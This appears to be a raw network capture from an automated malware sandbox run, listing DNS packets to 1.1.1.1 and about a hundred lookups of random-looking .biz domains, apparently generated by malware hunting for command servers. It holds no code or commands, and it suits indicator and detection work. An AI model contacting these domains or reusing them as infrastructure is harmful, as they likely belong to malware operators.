                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.328636885 CET53558681.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.329355955 CET6431753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.337044001 CET53643171.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:33.835798979 CET53619721.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.206325054 CET5482353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.214323997 CET53548231.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.287723064 CET5411053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.295032024 CET53541101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.984488010 CET5898653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.991656065 CET53589861.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.432199955 CET6317453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.439444065 CET53631741.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.805805922 CET5697153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.812618017 CET53569711.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.813663960 CET4950953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.821398020 CET53495091.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.507563114 CET5940253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.515240908 CET53594021.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.697293997 CET5487153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.704456091 CET53548711.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.153661013 CET5143353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.175275087 CET5143353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.253243923 CET53514331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.253258944 CET53514331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.013878107 CET5495453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.021461964 CET53549541.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.215331078 CET5871053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.222269058 CET53587101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.081593037 CET6043053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.089057922 CET53604301.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.762034893 CET6337953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.769203901 CET53633791.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.667279959 CET5880553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.674583912 CET53588051.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.698772907 CET6126553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.706001043 CET53612651.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.529159069 CET6149253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.536720037 CET53614921.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.185100079 CET5393253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.192956924 CET53539321.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.351147890 CET5148653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.377450943 CET5148653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.450458050 CET53514861.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.450473070 CET53514861.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.290489912 CET5175353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.297688007 CET53517531.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.633656025 CET6016753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.641279936 CET53601671.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.139195919 CET6444253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.146872997 CET53644421.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.890988111 CET6121453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.898390055 CET53612141.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.579372883 CET6548353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.587099075 CET53654831.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.262933969 CET5663753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.272310019 CET53566371.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.349551916 CET6516453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.358274937 CET53651641.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.945874929 CET6097853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.953687906 CET53609781.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.716589928 CET6236953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.723918915 CET53623691.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:14.756660938 CET53499911.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.034600019 CET5449553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.041601896 CET53544951.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.745897055 CET5343953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.753410101 CET53534391.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.884335041 CET6177253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.893826008 CET53617721.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.212599039 CET5564253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.219635010 CET53556421.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.344928980 CET5240153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.351780891 CET53524011.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:18.671703100 CET5933653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:18.680030107 CET53593361.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:18.793114901 CET5884653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:18.800503016 CET53588461.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:19.357824087 CET6427153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:19.364727974 CET53642711.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:19.633423090 CET6466353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:19.640556097 CET53646631.1.1.1192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.780493021 CET192.168.2.81.1.1.10x2890Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.539175987 CET192.168.2.81.1.1.10xc696Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.644606113 CET192.168.2.81.1.1.10x985fStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.521153927 CET192.168.2.81.1.1.10x79baStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.066654921 CET192.168.2.81.1.1.10x4fefStandard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.335480928 CET192.168.2.81.1.1.10xac08Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.510158062 CET192.168.2.81.1.1.10x612Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.166958094 CET192.168.2.81.1.1.10x8e9aStandard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.261859894 CET192.168.2.81.1.1.10xcb45Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.974544048 CET192.168.2.81.1.1.10x5a0dStandard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.171642065 CET192.168.2.81.1.1.10x469fStandard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.876559019 CET192.168.2.81.1.1.10x3b96Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.587219954 CET192.168.2.81.1.1.10xc030Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.596143007 CET192.168.2.81.1.1.10xbc64Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.755439997 CET192.168.2.81.1.1.10xeca1Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.553889990 CET192.168.2.81.1.1.10x70cdStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.942816019 CET192.168.2.81.1.1.10xd3b6Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.520258904 CET192.168.2.81.1.1.10x89c8Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.208398104 CET192.168.2.81.1.1.10x7ed6Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.763222933 CET192.168.2.81.1.1.10xcf36Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.838488102 CET192.168.2.81.1.1.10x7ce2Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.027750015 CET192.168.2.81.1.1.10x9b38Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.312442064 CET192.168.2.81.1.1.10xa0e9Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.179259062 CET192.168.2.81.1.1.10xb50eStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.943233967 CET192.168.2.81.1.1.10x5c18Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.446259975 CET192.168.2.81.1.1.10x342eStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.403558016 CET192.168.2.81.1.1.10xe11fStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.459177971 CET192.168.2.81.1.1.10x3f21Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.353635073 CET192.168.2.81.1.1.10x5872Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.943114996 CET192.168.2.81.1.1.10x5399Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.991374016 CET192.168.2.81.1.1.10x25b1Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.072154999 CET192.168.2.81.1.1.10x53d7Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.692435026 CET192.168.2.81.1.1.10xc6e3Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.916155100 CET192.168.2.81.1.1.10x918dStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.580729008 CET192.168.2.81.1.1.10xac57Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.729126930 CET192.168.2.81.1.1.10x5432Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.589586020 CET192.168.2.81.1.1.10x5473Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.397078037 CET192.168.2.81.1.1.10x8015Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.404727936 CET192.168.2.81.1.1.10xabe4Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.972453117 CET192.168.2.81.1.1.10xa228Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.422909021 CET192.168.2.81.1.1.10xf41dStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.229377985 CET192.168.2.81.1.1.10x56fdStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.469060898 CET192.168.2.81.1.1.10xa987Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.540858030 CET192.168.2.81.1.1.10xeb97Standard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.179589033 CET192.168.2.81.1.1.10x1bd0Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.600838900 CET192.168.2.81.1.1.10x3d0Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.777584076 CET192.168.2.81.1.1.10xf9d7Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.325391054 CET192.168.2.81.1.1.10xae09Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.338583946 CET192.168.2.81.1.1.10xae7fStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.041321039 CET192.168.2.81.1.1.10xd106Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.822761059 CET192.168.2.81.1.1.10x44Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.840404034 CET192.168.2.81.1.1.10x522cStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.303960085 CET192.168.2.81.1.1.10xc473Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.104712009 CET192.168.2.81.1.1.10xe4faStandard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.364041090 CET192.168.2.81.1.1.10xf79bStandard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.683653116 CET192.168.2.81.1.1.10x2d53Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.387754917 CET192.168.2.81.1.1.10x5c34Standard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.419096947 CET192.168.2.81.1.1.10xd7d6Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.468694925 CET192.168.2.81.1.1.10x490fStandard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.487046957 CET192.168.2.81.1.1.10x359cStandard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.329443932 CET192.168.2.81.1.1.10x33f0Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.487864971 CET192.168.2.81.1.1.10xc60aStandard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.358624935 CET192.168.2.81.1.1.10xb03cStandard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.786757946 CET192.168.2.81.1.1.10x4a9cStandard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.275650024 CET192.168.2.81.1.1.10x3e3dStandard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.284018993 CET192.168.2.81.1.1.10x4d9Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.276225090 CET192.168.2.81.1.1.10x4199Standard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.963239908 CET192.168.2.81.1.1.10x7f00Standard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.120903015 CET192.168.2.81.1.1.10x6ffdStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.647969961 CET192.168.2.81.1.1.10xd7cbStandard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.974940062 CET192.168.2.81.1.1.10xb5aaStandard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.114878893 CET192.168.2.81.1.1.10xc9f9Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.632378101 CET192.168.2.81.1.1.10x3ec7Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.797399998 CET192.168.2.81.1.1.10x4b1cStandard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.511996031 CET192.168.2.81.1.1.10x9b1bStandard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.600322008 CET192.168.2.81.1.1.10x9020Standard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.090923071 CET192.168.2.81.1.1.10x5fdStandard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.224944115 CET192.168.2.81.1.1.10x4a45Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.945012093 CET192.168.2.81.1.1.10x356bStandard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.242156029 CET192.168.2.81.1.1.10xb6d8Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.065936089 CET192.168.2.81.1.1.10x855fStandard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.402904034 CET192.168.2.81.1.1.10x2585Standard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.301482916 CET192.168.2.81.1.1.10x3b7cStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.330378056 CET192.168.2.81.1.1.10x2895Standard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.199665070 CET192.168.2.81.1.1.10x60a7Standard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.345973015 CET192.168.2.81.1.1.10xe98aStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.081561089 CET192.168.2.81.1.1.10xee65Standard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.645561934 CET192.168.2.81.1.1.10xb4c8Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.944056988 CET192.168.2.81.1.1.10x7ac1Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.951494932 CET192.168.2.81.1.1.10xf4dbStandard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.753448963 CET192.168.2.81.1.1.10xd7aaStandard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.813314915 CET192.168.2.81.1.1.10x95f8Standard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.173361063 CET192.168.2.81.1.1.10xe7e5Standard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.418461084 CET192.168.2.81.1.1.10x51c9Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.053200006 CET192.168.2.81.1.1.10xf758Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.921578884 CET192.168.2.81.1.1.10x82e9Standard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.117820024 CET192.168.2.81.1.1.10xae98Standard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.776889086 CET192.168.2.81.1.1.10x5a19Standard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.836184025 CET192.168.2.81.1.1.10x9249Standard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.639446020 CET192.168.2.81.1.1.10x4641Standard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
